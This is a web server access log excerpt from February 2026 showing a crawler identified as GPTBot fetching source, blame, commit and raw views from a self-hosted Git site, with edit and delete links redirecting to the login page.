74.7.227.38] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:16:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10992] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:16:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11418] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11419] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:29:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:16:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:16:29:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:16:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:16:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9825] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:16:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:16:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:16:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" -[17/Feb/2026:16:29:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:29:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:16:29:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" -[17/Feb/2026:16:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/status.json" -[17/Feb/2026:16:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10472] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:29:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:16:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/tsconfig.json" -[17/Feb/2026:16:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9779] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:16:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12240] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main...main?expand=1" [Client 74.7.227.38] [Length 8423] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" -[17/Feb/2026:16:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" -[17/Feb/2026:16:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html" [Client 74.7.227.38] [Length 19228] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:16:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:16:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" -[17/Feb/2026:16:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html?display=source" [Client 74.7.227.38] [Length 31033] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" -[17/Feb/2026:16:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 13549] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" -[17/Feb/2026:16:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16168] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" -[17/Feb/2026:16:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14294] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main...main" [Client 74.7.227.38] [Length 8410] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/compare/main...main?expand=1" -[17/Feb/2026:16:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/compare/main..main" [Client 74.7.227.38] [Length 8387] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/compare/main...main?expand=1" -[17/Feb/2026:16:30:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:16:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/metadata.json" -[17/Feb/2026:16:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14414] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" -[17/Feb/2026:16:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" -[17/Feb/2026:16:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json?display=source" [Client 74.7.227.38] [Length 11031] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" -[17/Feb/2026:16:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" -[17/Feb/2026:16:30:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/index.html" -[17/Feb/2026:16:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/index.html" -[17/Feb/2026:16:30:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/index.html" -[17/Feb/2026:16:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/index.html" -[17/Feb/2026:16:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11870] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" -[17/Feb/2026:16:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 37580] [Gzip 7.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 